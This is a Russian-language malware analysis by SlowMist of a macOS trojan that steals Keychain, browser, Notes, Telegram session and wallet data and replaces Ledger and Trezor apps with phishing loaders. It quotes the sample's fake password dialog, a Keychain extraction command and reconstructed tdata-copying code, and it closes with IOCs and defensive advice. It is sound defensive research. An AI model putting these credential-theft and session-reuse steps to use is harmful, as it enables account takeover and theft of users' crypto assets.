Как троян macOS нарушает защиту с помощью скомпрометированных аккаунтов TG и кошельков?
Троян-шпион для macOS крадет разговоры TG и данные кошелька, а также заменяет клиенты аппаратных кошельков для реализации атак двойного кражи активов.
Автор: Команда безопасности Slow Mist
Предыстория
Недавно система мониторинга безопасности MistEye зафиксировала троян-шпион, работающий на macOS. Команда безопасности Slow Mist немедленно начала анализ.
Из списка украденных данных образец, похоже, проводит сбор данных без фокуса: macOS Keychain, куки Safari, заметки Apple, локальные данные из Telegram Desktop и базы данных более десятка цифровых кошельков входят в целевой диапазон.
В предыдущей статье «Анализ фишинга на сайтах Google и трояна-шпиона для macOS» мы ответили на вопрос «Что украл троян?» Однако копирование файлов не равняется компрометации аккаунта, и получение базы данных кошелька не означает, что мнемоническая фраза была утечена. Поэтому в этой статье мы задаем дальнейший вопрос:
После того как эти файлы украдены, могут ли они действительно привести к контролю над аккаунтами и активами?
Мы воспроизвели путь образца в изолированной среде. Сначала мы восстановили файлы сессий Telegram Desktop, скопированные образцом, на совместимом Mac, а затем запустили клиент.
Интерфейс входа не появился.
Не было запроса на номер телефона, не было отправлено кода подтверждения и не было запроса на пароль двухфакторной аутентификации Telegram. Клиент напрямую восстановил оригинальный статус аккаунта и начал синхронизацию записей чата.
Этот шаг впервые преобразовал цепочку атаки из «статических файлов» в наблюдаемые результаты: то, что переместил злоумышленник, не было обычной конфигурацией, а локально аутентифицированным доступом.
Затем мы проверили другой путь: база данных кошелька и кандидаты на пароли могут конвергировать в оффлайн-среде; образец также удаляет изначально установленный клиент кошелька пользователя, заменяя его удаленной веб-оболочкой, замаскированной под законное имя и иконку.
Эти, казалось бы, разрозненные функции в конечном итоге формируют полную цепочку захвата:
- Сначала собираются пароли, материалы для разблокировки и существующие состояния входа;
- Перемещение локально авторизованных сессий Telegram Desktop;
- Копирование базы данных кошелька и состояний расширений браузера для кошельков;
- Попытка оффлайн-дешифровки в среде злоумышленника;
- Одновременно удаление законного кошелька и замена его удаленным приложением WebView, побуждая пользователя активно предоставить мнемоническую фразу.
Эта статья основана на отчете о статическом анализе основного образца, статических отчетах о трех пакетах замены кошельков, эквивалентной логике, восстановленной аналитиками на основе дизассемблирования, и вспомогательных материалах LevelDB, используемых для оффлайн-судебной проверки.
Шаг 1: Сбор паролей и материалов для разблокировки
Способность напрямую восстанавливать сессии Telegram не означает, что злоумышленник взломал пароль Telegram. Базу данных кошелька можно попытаться расшифровать, не потому что программное обеспечение для кошелька не зашифровано.
Что злоумышленник должен сделать в первую очередь, так это собрать как можно больше паролей, материалов для разблокировки и все еще действительных состояний входа. Keychain, базы данных браузеров, заметки Apple и замаскированные всплывающие окна с паролями — все это компоненты этого шага.
Всплывающее окно фишинга пароля:
Образец будет показывать диалоговое окно пароля, замаскированное под обновление соединителя Google API:
set passwen to display dialog "GAPI_Update требует административного доступа для обновления соединителя Google API. Введите свой пароль, чтобы разрешить это." default answer "" with icon caution buttons {"Продолжить"} default button "Продолжить" giving up after 150 with title "Запрос пароля" with hidden answer text returned of passwen
Он не просто собирает содержимое в поле ввода и останавливается на этом. Образец впоследствии использует команду macOS dscl для проверки, может ли этот пароль действительно пройти локальную аутентификацию:
dscl . authonly ' <текущий_имя_пользователя> ' ' <кандидат_пароль> '
Другими словами, образец пытается подтвердить, что введенный пользователем текст является локальным паролем для входа, а не просто случайной строкой. После проверки этот пароль может быть использован для последующего повышения привилегий, удаления приложений и других операций.
Сбор учетных данных браузера и Keychain:
Тем временем образец пытается прочитать ключ безопасного хранилища Chrome из Keychain:
security find-generic-password -ga "Chrome"2>&1 >/dev/null | sed -n 's/^password: "(.*)"/\1/p'
Результат записывается во временный файл masterpass-chrome. Безопасное хранилище Chrome можно понимать как ключ дешифрования, сохраненный в Keychain macOS браузером. С его помощью злоумышленник может забрать зашифрованные данные для входа и куки Chrome для дальнейшего анализа в своей среде.
Объем сбора браузера образца охватывает браузеры на основе Chromium, такие как Chrome, Brave, Edge, Vivaldi и Opera, нацеливаясь на файлы, включая Login Data, Cookies, Web Data, formhistory.sqlite и т. д.; для браузеров, таких как Firefox, он сосредоточен на logins.json, key4.db и данных Cookie.
Образец также будет находить и собирать:
Keychains/login.keychain-db
Group Containers/group.com.apple.notes/NoteStore.sqlite
Содержат ли заметки на самом деле пароли, мнемонические фразы кошелька, пароли Telegram или коды восстановления, зависит от собственных записей пользователя. Однако кодовый уровень уже имеет возможность читать учетные данные и содержимое.
Поэтому то, что злоумышленник получает на этом этапе, — это не один пароль, а пакет материалов, которые могут дополнять друг друга:
- Прямой ввод пароля: пароль для входа в macOS, полученный из замаскированного диалога;
- Материалы для разблокировки: Keychain, безопасное хранилище Chrome и зашифрованные базы данных браузеров;
- Эквиваленты учетных данных: куки, содержимое заметок и последующие данные сессий и кошельков.
Эти материалы могут быть недостаточны для захвата аккаунта или кошелька по отдельности, но они подготавливают ключи для последующего «миграции сессий» и «оффлайн-дешифровки».
Шаг 2: Перемещение сессий Telegram
Поиск каталога сессий tdata:
Образец нацеливается не на веб-версию Telegram или мобильную версию, а на клиент Telegram Desktop. Он будет находить:
~/Library/Application Support/Telegram Desktop/tdata/
Здесь tdata можно просто понять как набор данных сессий, сохраненных локально Telegram Desktop для поддержания состояния входа.
Образец скопирует файлы, связанные с ключами, конфигурациями и состояниями сессий, включая:
- key_datas: связанные с локальными tdata ключами или конфигурациями;
- <name>s: связанные с локальными состояниями сессий;
- <name>/maps: часть сопоставления данных сессий.
Согласно восстановленной эквивалентной логике, образец сначала копирует key_datas, затем проходит по каталогу, чтобы найти парные файлы сессий, и записывает соответствующие данные во временный каталог:
std::string src = app_support + "Telegram Desktop/tdata/";std::string dst = staging + "tg/";
copy_file(src + "key_datas", dst + "key_datas");
std::vector<std::string> names = list_directory_names(src);for (conststd::string& name : names) {if (contains(names, name + "s")) { copy_file(src + name + "s", dst + name + "s"); copy_file(src + name + "/maps", dst + name + "/maps"); }}
Это не о «поиске нескольких имен файлов Telegram», а о четкой цепочке копирования файлов сессий. После завершения копирования основной процесс сжимает и загружает временный каталог.
Восстановление сессий, обход входа:
Чтобы проверить фактический риск утечки этих файлов, мы подготовили совместимую версию Telegram Desktop (macOS 12.7 / Telegram Desktop 4.16) в изолированной среде и восстановили ключевые файлы, украденные образцом, в соответствующее место.
Тестирование с неограниченной тестовой учетной записью, которая не содержит реальных активов, аккаунт включил двухфакторную аутентификацию Telegram (2FA), но не активировал пароль для доступа Telegram Desktop.
После восстановления файла и запуска клиента процесс входа не требовал:
- Не нужно вводить номер телефона;
- Не нужно SMS-код подтверждения;
- Не нужен пароль двухфакторной аутентификации Telegram.
Клиент напрямую восстановил статус входа оригинального аккаунта и затем начал синхронизацию истории чата.
Это означает, что злоумышленнику не требуется новое авторизованное разрешение, а только действительная локальная сессия.
То, что он крадет, — это не пароль для входа, а «пропуск», который уже прошел проверку.
Повторное использование сессий против взлома 2FA:
Здесь необходимо различать «обход 2FA» и «повторное использование существующей сессии».
Двухфакторная аутентификация Telegram в основном защищает процесс авторизации нового аккаунта. Когда злоумышленник напрямую восстанавливает уже авторизованные локальные материалы сессий, клиент не повторно выполняет полный процесс аутентификации для номера телефона, кода подтверждения и пароля двухфакторной аутентификации.
Поэтому более точное утверждение: злоумышленник повторно использовал уже авторизованную локальную сессию, поэтому 2FA не была снова активирована. Это не означает, что пароль 2FA Telegram был взломан, а скорее, что весь процесс повторного использования не вошел в стадию, требующую проверки этого пароля.
Пользователи могут не сразу заметить аномалии:
При условиях этого теста скопированная сессия не постоянно появлялась как четкая, независимая запись авторизации нового устройства в списке устройств. Это означает, что даже если пользователи активно проверяют вошедшие устройства, они могут не сразу осознать, что локальные данные сессии были скопированы.
Когда оригинальное устройство и воспроизведенное устройство используются одновременно в течение длительного времени, сервер может аннулировать сессию на одном конце и потребовать повторного входа. Однако в более коротких, прерывистых тестах доступа сессия не была немедленно принудительно завершена.
Аномальное обнаружение сервером может сократить срок действия некоторых украденных сессий, но не может заменить защиту локальных данных tdata.
Если в Telegram Desktop включен пароль, после восстановления сессии злоумышленнику может все же потребоваться ввести этот пароль. Это действительно добавляет уровень защиты, но этот троян также собирает данные из Keychain, заметок Apple и браузеров. Если пользователи записали пароль Telegram в этих местах или использовали одни и те же пароли в нескольких приложениях, эта защита все равно может быть нарушена.
tdata может быть дополнительно преобразован в API-сессии:
В дополнение к вышеупомянутым методам мы также обнаружили, что после получения tdata Telegram его можно объединить с opentele, Telethon, авторизованным AuthKey и параметрами API официального клиента, чтобы преобразовать локальное состояние входа в программируемую сессию API Telegram для чтения разговоров, исторических сообщений и отправки сообщений. Тесты показывают, что скрипт может использовать короткие, прерывистые соединения, не оставаясь в сети долго, тем самым снижая риск немедленного вызова аномальных выходов. Поскольку оригинальная авторизация повторно используется, не произойдет нового входа устройства, и не будет четких, независимых записей нового устройства в списке устройств входа, что затрудняет пользователям обнаружение аномалий только по проверке вошедших устройств.
Telegram для macOS также имеет риски повторного использования сессий:
Вышеуказанный анализ нацелен на Telegram Desktop (кроссплатформенный десктопный клиент на основе Qt). Однако Telegram также предоставляет другой нативный клиент на macOS — Telegram для macOS (нативная версия Swift, загружаемая независимо из App Store или с официального сайта). Тесты на этой версии показывают, что ее локальные файлы сессий также могут быть скопированы и напрямую восстановлены на другом Mac: вход в аккаунт без номера телефона, кода подтверждения или пароля двухфакторной аутентификации, и список устройств входа не покажет новую запись, представляющую воспроизведенное устройство.
Кроме того, существует заметная разница в реакции механизма безопасности между Telegram для macOS и Telegram Desktop: когда сервер обнаруживает аномальное поведение при входе, Telegram для macOS не принудительно выходит и не очищает локальные данные, как версия Desktop. В наших тестах, хотя клиент, отмеченный механизмом безопасности, не мог отправлять или получать новые сообщения, он все еще мог держать интерфейс открытым, позволяя злоумышленнику продолжать просматривать и просматривать уже существующие исторические записи чата. Другими словами, даже если сервер отреагировал, ранее кэшированные исторические сообщения все еще могут быть полностью отслежены без принудительного выхода.
Это означает, что в этом сценарии атаки нативный клиент macOS не может быть воспринят пользователями через обычное измерение «новых устройств входа», и даже после того, как сервер обнаруживает аномалии, исторические записи чата остаются открытыми — злоумышленники могут потерять возможность отправлять и получать сообщения в реальном времени, но кэшированное историческое содержимое все еще можно читать в полном объеме.
На этом этапе путь для Telegram ясен: будь то Telegram Desktop или Telegram для macOS, злоумышленникам не нужно повторно входить в аккаунт; им нужно только переместить уже авторизованную локальную сессию с Mac жертвы в свою среду.
Шаг 3: Кража данных кошелька
Сессии Telegram могут быть повторно использованы напрямую, в то время как базы данных кошельков обычно имеют дополнительный уровень шифрования. Подход образца заключается в том, чтобы скопировать как можно больше данных кошелька, оставляя место для последующего анализа.
Полное покрытие 16 кошельков:
Образец будет искать 16 типов локальных кошельков или клиентов управления кошельками, охватывающих программные кошельки, клиенты полного узла класса Core и программы управления аппаратными кошельками:
- Программные кошельки: Electrum, Coinomi, Exodus, Atomic, Wasabi, Monero, Electrum LTC, Electron Cash, Guarda, Sparrow;
- Клиенты класса Core: Bitcoin Core, Litecoin Core, Dash Core, Dogecoin Core;
- Клиенты управления аппаратными кошельками: Ledger Live, Trezor Suite.
Разные кошельки имеют разные каталоги данных, форматы баз данных и методы шифрования, но основная стратегия, используемая образцом, остается неизменной: находить каталоги, копировать базы данных кошельков и конфигурационные файлы, упаковывать и передавать их, продолжая анализ в среде злоумышленника.
Во время копирования образец пропустит кэш, кэш кода, crashpad, журналы, медиа, вызовы и другие кэшированные и шумовые каталоги, приоритизируя сохранение данных о состоянии аккаунта и кошелька.
Это приводит к легко недооцененному следствию: даже если данные кошелька находятся в зашифрованном состоянии, как только полная база данных была передана, злоумышленники могут отделиться от устройства жертвы и многократно пытаться расшифровать. Жертвы, закрывающие кошелек, отключающиеся от сети или даже удаляющие троян, не могут восстановить данные, которые уже были скопированы.
Сбор данных расширений браузера:
В дополнение к настольным кошелькам образец также просканирует каталоги конфигураций более чем дюжины браузеров на основе Chromium, таких как Chrome, Brave, Edge, Vivaldi и Opera.
Он соберет куки, данные для входа, данные веб-форм, а также локальное хранилище расширений и данные IndexedDB для каталога Default или Profile каждого браузера. Образец имеет встроенные 223 идентификатора расширений, связанных с кошельками, чтобы фильтровать и копировать локальное хранилище зашифрованных расширений кошельков.
Эти данные не равны открытым мнемоническим фразам, но могут содержать кошелек Vault, конфигурации аккаунта, статусы авторизации и материалы для входа в браузер, которые могут быть использованы для оффлайн-анализа, миграции статуса и последующего целевого фишинга.
На этом этапе злоумышленник уже имеет два типа ключевых материалов: с одной стороны — зашифрованная база данных кошелька, а с другой стороны — кандидаты на пароли, собранные из системы, браузера и заметок. Следующий шаг — посмотреть, могут ли эти два типа материалов быть объединены.
Шаг 4: Оффлайн-дешифровка кошельков
На примере Atomic Wallet:
Мы выбираем Atomic Wallet для локального воспроизведения. Образец скопирует локальный каталог хранения LevelDB Atomic Wallet. LevelDB — это общий локальный формат базы данных, и кошельки хранят статус аккаунта и чувствительные данные внутри него.
Данные в этом каталоге зашифрованы с использованием AES-256-CBC, и для расшифровки требуется пароль кошелька.
Поэтому получение файла LevelDB само по себе не означает, что злоумышленник приобрел открытые мнемонические фразы. Пароль кошелька по-прежнему служит барьером между базой данных и чувствительными данными.
Однако этот барьер необходимо рассматривать в рамках всей цепочки атаки.
Попытки паролей из нескольких источников:
В изолированной тестовой среде (Atomic Wallet 2.70) мы восстановили данные LevelDB, скопированные из образца, и использовали кандидаты на пароли, собранные из Keychain, менеджеров паролей браузера, заметок Apple и других мест, чтобы расшифровать их один за другим.
В конечном итоге кандидаты на пароли успешно расшифровали данные, содержащие материалы управления активами.
Этот шаг выявил самую опасную сторону образца: злоумышленнику не обязательно искать уязвимости шифрования в самом программном обеспечении кошелька, и ему не нужно пытаться вводить пароли в реальном времени на компьютере жертвы.
Им нужно всего лишь одновременно забрать две вещи: зашифрованную базу данных кошелька и пакет паролей, которые могут принадлежать пользователю. База данных похожа на украденный сейф, в то время как кандидаты на пароли — это сложный набор запасных ключей. Злоумышленник может проверять их один за другим в оффлайн-среде без временных ограничений.
Необратимое раскрытие частных ключей:
Как только частный ключ, мнемоническая фраза или эквивалентные материалы управления активами восстановлены, риск больше не ограничивается конкретным клиентом кошелька. Злоумышленник может восстановить тот же набор адресов в другом совместимом кошельке и получить контроль над соответствующими активами.
На этом этапе изменение пароля приложения, переустановка клиента или даже удаление локальных файлов кошелька не аннулирует уже раскрытые частные ключи или мнемонические фразы.
На этом этапе путь оффлайн-дешифровки данных кошелька ясен. Однако образец не остановился на этом — он также развернул другой параллельный путь атаки для нескольких высокоценных целей.
Шаг 5: Замена приложений для кошельков
Загрузка вредоносного ZIP для замены приложений:
В основном образце мы обнаружили набор операций, которые явно отличались от обычной кражи файлов: троян будет загружать три ZIP-пакета с удаленного сервера в каталог /tmp, одновременно удаляя изначально установленный пользователем Ledger Live, Ledger Wallet и Trezor Suite.
Функция swap_app() в основном образце выполняет полный процесс замены: загружает сжатый пакет с помощью curl, завершает работающие процессы кошелька с помощью pkill, удаляет оригинальное приложение с помощью rm -rf, повышает привилегии с помощью sudo, если это необходимо, и, наконец, использует ditto для извлечения сжатого пакета в /Applications.
Пакет замены — это просто веб-загрузчик:
Согласно именам файлов и иконкам, эти ZIP-пакеты, похоже, соответствуют трем законным клиентам кошельков. Однако обратный анализ показывает, что они не реализуют реальную функциональность кошелька.
Основной поток выполнения трех программ замены очень похож: чтение скрытых конфигураций, расшифровка удаленных маршрутов с помощью XOR, сборка полных URL-адресов, создание WKWebView, который включает JavaScript, а затем загрузка удаленной страницы, контролируемой злоумышленником.
WKWebView можно понимать как веб-окно, встроенное в десктопное приложение. Оно позволяет удаленным веб-страницам накладываться на интерфейс приложения, не появляясь как вкладка браузера.
Статический анализ подтверждает, что пакет замены включает JavaScript и постоянное хранилище данных, но не было найдено реальных реализаций бизнес-логики Ledger или Trezor: никакой USB/HID-коммуникации, никакой нумерации аппаратных устройств, никакого выведения ключей BIP39/BIP32 и никакого построения транзакций или локальной подписи.
Другими словами, эти программы не являются модифицированными клиентами кошельков, а представляют собой веб-загрузчики, замаскированные под имена и иконки кошельков.
Конечные удаленные адреса, загружаемые тремя заменяемыми приложениями:
Ledger Live и Ledger Wallet указывают на один и тот же маршрут /ledger, в то время как Trezor Suite загружает маршрут /trezor. Удаленная страница означает, что злоумышленник может в любое время изменять содержимое страницы, текст взаимодействия и логику отправки данных, не требуя повторной публикации локального приложения.
Фишинговые страницы за иконками настольных приложений:
Когда пользователи запускают эти замененные «кошельковые» приложения, удаленная страница может маскироваться под процесс восстановления, проверки или инициализации кошелька, направляя пользователей вводить свои мнемонические фразы, PIN-коды, пароли или другие материалы для восстановления.
Для обычных пользователей это труднее распознать, чем традиционные фишинговые веб-страницы. Страница не появляется во вкладке браузера, а вместо этого в настольном приложении, установленном в каталоге /Applications, с знакомым именем и иконкой.
Пользователи могут думать, что это процесс проверки после обновления кошелька, или они могут считать, что следуют официальным инструкциям по восстановлению своих аккаунтов.
Если пользователи отправят свои мнемонические фразы на этой удаленной странице, то злоумышленник получит не временный доступ к конкретному приложению, а высшие контрольные учетные данные для активов кошелька.
Оффлайн-дешифровка включает поиск мнемонических фраз в существующих данных; замена приложений, с другой стороны, побуждает пользователей вводить свои мнемонические фразы самостоятельно. Эти два пути работают параллельно и независимы друг от друга.
Обзор цепочки атаки
Оглядываясь на первоначальный список украденных предметов, Keychain, куки, заметки, Telegram и файлы кошельков кажутся независимыми целями. После воспроизведения их взаимосвязи становятся ясными:
- Keychain, браузер и заметки предоставляют пароли, пароли и другие материалы для разблокировки;
- Куки Safari могут предоставить все еще действительные веб-сессии входа;
- tdata Telegram предоставляет уже авторизованные сессии аккаунтов;
- Базы данных кошельков предоставляют зашифрованные данные, которые можно взять, скопировать и проанализировать оффлайн;
- Замененные приложения Ledger и Trezor направляют пользователей на удаленные фишинговые страницы через другой независимый путь.
Каждый модуль, рассматриваемый отдельно, напоминает обычное поведение кражи. Истинная опасность заключается в способности образца комбинировать эти материалы.
Для Telegram злоумышленник обходит не силу пароля, а саму повторную аутентификацию. Для локальных кошельков злоумышленник использует одновременную кражу зашифрованных данных и материалов паролей. Для Ledger и Trezor злоумышленник больше не пытается взломать существующие данные, а переопределяет «доверенный интерфейс» в глазах пользователя, заменяя клиента.
Что действительно нужно злоумышленнику, часто не один пароль, а одновременное обладание авторизованными сессиями, зашифрованными данными и материалами для разблокировки.
Резюме
Этот троян не крадет несколько изолированных паролей или файлов, а скорее всю локальную доверительную связь, которую пользователь постепенно построил на Mac: уже вошедшие сессии, сохраненные пароли, зашифрованные кошельки и доверие пользователя к самому настольному приложению.
Когда эти предметы покидают устройство одновременно, разрыв между утечкой информации, захватом аккаунта и кражей цифровых активов преодолевается успешной комбинацией данных.
Атака на кошелек по двум путям. Образец подготовил два резервных пути для активов кошелька: первый путь — украсть базу данных кошелька и кандидаты на пароли для оффлайн-дешифровки; второй путь — заменить клиент аппаратного кошелька, загрузить удаленные страницы и побудить пользователей активно предоставить свои мнемонические фразы. Эти два пути работают параллельно, охватывая соответственно «пассивную кражу» и «активное побуждение».
Повторное использование сессий, а не взлом паролей. Злоумышленник напрямую копирует уже авторизованные локальные файлы сессий, восстанавливая статус входа в новой среде без активации процесса повторной аутентификации.
Комбинация учетных данных из нескольких источников. Образец не полагается на единственный источник паролей, а собирает кандидаты на пароли из нескольких каналов, включая Keychain, менеджеры паролей браузеров, заметки Apple и замаскированные диалоговые окна, увеличивая шансы на оффлайн-дешифровку базы данных кошелька.
Рекомендации
- Если есть подозрение, что хост заражен, немедленно завершите все существующие сессии Telegram на доверенном устройстве, восстановите доверительное состояние входа и измените пароль двухфакторной аутентификации Telegram и пароль доступа. Простая смена пароля 2FA может не немедленно аннулировать уже скопированную локальную сессию.
- Если база данных кошелька или материалы частного ключа могли быть утечены, создайте совершенно новую мнемоническую фразу на чистом устройстве или доверенном аппаратном кошельке, как можно скорее переместите активы на новый адрес и прекратите использование старой мнемонической фразы. Простая смена пароля приложения для кошелька не аннулирует утеченные частные ключи или мнемонические фразы.
- Поменяйте все пароли, сохраненные или повторно использованные в Keychain, заметках Apple и браузерах, сосредоточив внимание на электронной почте, биржах, облачном хранилище, менеджерах паролей и социальных аккаунтах, и выйдите из существующих сессий входа в этих сервисах.
- Для клиентов Ledger или Trezor, которые могли быть удалены и заменены, сначала удалите подозрительные приложения, проверьте подписи кода и источники установки, исследуйте связанные элементы постоянства (такие как LaunchDaemon), а затем получите установочные пакеты из официальных доверенных каналов. Если мнемонические фразы были введены в замененные приложения, считайте их утеченными немедленно.
- Для менее часто используемых клиентов Telegram (таких как настольные или нативные клиенты macOS, установленные на конкретных устройствах, но не открываемые долгое время) рекомендуется регулярно проверять их статус входа или проактивно завершать сессии, которые больше не нужны. Из-за низкой частоты использования этих клиентов, даже если учетные данные для входа были скомпрометированы и восстановлены в среде злоумышленника, пользователи могут не обнаружить аномалии своевременно. Обнаружение безопасности на стороне сервера обычно зависит от изменений в поведении активных сессий, что затрудняет автоматическое выявление аномальных входов для клиентов, которые долго молчали. Как только они будут скомпрометированы, злоумышленники могут поддерживать молчаливый контроль над аккаунтом в течение длительного времени, непрерывно читая новые сообщения без вызова каких-либо предупреждений.
- В повседневном использовании включите пароль для Telegram и установите пароль высокой прочности, отличающийся от других паролей, чтобы избежать использования слабых паролей, тем самым повышая защиту локальных сессий.
IOC
IP
192[.]253[.]248[.]181
86[.]54[.]25[.]213
URL
http[://192[.]253[.]248[.]181/web/ledger.zip
http[://192[.]253[.]248[.]181/web/ledgerwallet.zip
http[://192[.]253[.]248[.]181/web/trezor.zip
http[://86[.]54[.]25[.]213/ledger?username=night
http[://86[.]54[.]25[.]213/trezor?username=night
http[://86[.]54[.]25[.]213/log
Вредоносные файлы
имя файла: ledger.zip
SHA256: 41d77fef030b8515efb068defed5e15c14fbebd16259253f1f79febd6e12ebcb
имя файла: ledgerwallet.zip
SHA256: 36f4ae11560ed34f32c927468a09a5370a5fbdcae41660f6e8d9a49330c8d059
имя файла: trezor.zip
SHA256: 60f33e7b8c6b84839e28c710c8c5a99a718c0b88135653561be8d45f976b794f
Отказ от ответственности: Данный контент предоставляется исключительно в целях общего брендинга и предоставления информации и не является финансовой, инвестиционной, юридической или налоговой консультацией. Любые события, вознаграждения, онлайн-мероприятия или связанная с ними информация, упомянутые здесь, не должны рассматриваться как рекомендация, предложение или приглашение к покупке, продаже, торговле или иным операциям с криптоактивами или к использованию каких-либо услуг. Криптовалюты обладают высокой волатильностью и могут привести к убыткам. Услуги WEEX и онлайн-мероприятия могут быть недоступны во всех регионах и регулируются применимыми законами, правилами и требованиями к участию. Вы несете ответственность за обеспечение соответствия использования вами услуг WEEX местным законам и за тщательную оценку рисков перед участием в любой деятельности, связанной с криптовалютами.
Вам также может понравиться

Возврат Core Scientific в 75% от сделки с ИИ не является шаблоном для майнеров биткойнов, говорит Bernstein

DTCC запускает услуги токенизации ценных бумаг, первоначально охватывающие около 1000 наименований, включая акции США и государственные облигации

Партнёр Multicoin Capital Тушар Джайн: рынок достиг дна! Оптимизм по поводу SOL, HYPE и ZEC

Инвестиции в глобальные финтех-компании увеличились, но количество сделок резко сократилось… "Селективные инвестиции" становятся очевидными

"Оптимистичный" Том Ли: Главный краткосрочный победитель продуктивности ИИ — финансовый сектор, повышая цель S&P 500 до 8000 пунктов

52% украинцев рассматривают Карпаты как вариант летнего отпуска – опрос

Американские акции — это судьба страны: Трамп превращает США в фонд

Рынки прогнозов достигли 100 миллионов долларов годового дохода за два месяца: самый быстрый продукт Coinbase

Как начать использовать аккаунт Olive: объяснение связи с SBI Securities и открытия счета

5 графиков, чтобы понять крипторынок во втором квартале: взрыв RWA, фундаментальные показатели продолжают улучшаться

Сунь Юйчэнь и его интерес к ядерной энергетике: начало волны IPO

Noxa только что заработала за 3 дня и исчезла, что сейчас происходит на цепочке Robinhood

Galaxy запускает DeFi-кредит с "щитами" на 100 миллионов долларов

Почему инвестиции в полупроводники ИИ продолжают расти, а капитал начинает покидать акции оборудования?

Pudgy Penguins объявили: на выставке Comic-Con в Сан-Диего в 2026 году будет представлен оригинальный комикс о приключениях Пакса Пингвина и Полли

SBI, DigiFT и Startale запускают PoC для фондового фонда с использованием токена JPYSC

Искусственный интеллект нуждается в паузе, но кто имеет право нажать на кнопку?

Профессор Сакаи из Университета Кэйо говорит о "Веке предсказательных рынков: социальная реализация коллективного разума"|WebX2026

Что такое тест Хоуи? Правило 1946 года, которое решает, какие токены являются ценными бумагами

Важные новости за ночь и утро (14-15 июля)

Сунь Юйчэнь на WebX 2026: TRON движется к финансовой базе для AI-умных систем

Правительство Великобритании объявило о значительном смягчении налоговых норм для DeFi! Основатель Aave Стани Кулечов публично одобрил это решение

Что такое разблокировка токенов? Объяснение вестинга, клиффов и графиков поставок

Остановка домена «t.me» Telegram влияет на доступ к кошелькам TON и экосистеме криптовалют

Понимание статьи основателя Circle Джереми Аллера о 'Экономике агентов': Взгляды на то, как экономические структуры будут трансформироваться в следующем десятилетии

Эпоха великих географических открытий HashKey On-Chain: Полное принятие RWA и создание новой парадигмы финансовой инфраструктуры на блокчейне

Финансовая стратегия трех мегабанков на блокчейне: будущее банков, изменяемое стейблкоинами и ИИ|WebX2026

Ассоциация банков США требует ужесточения регулирования процентов по стейблкоинам в письме сенаторам

На рынке биткойнов сложились «три благоприятных условия», но восстановление тренда под вопросом — Wintermute





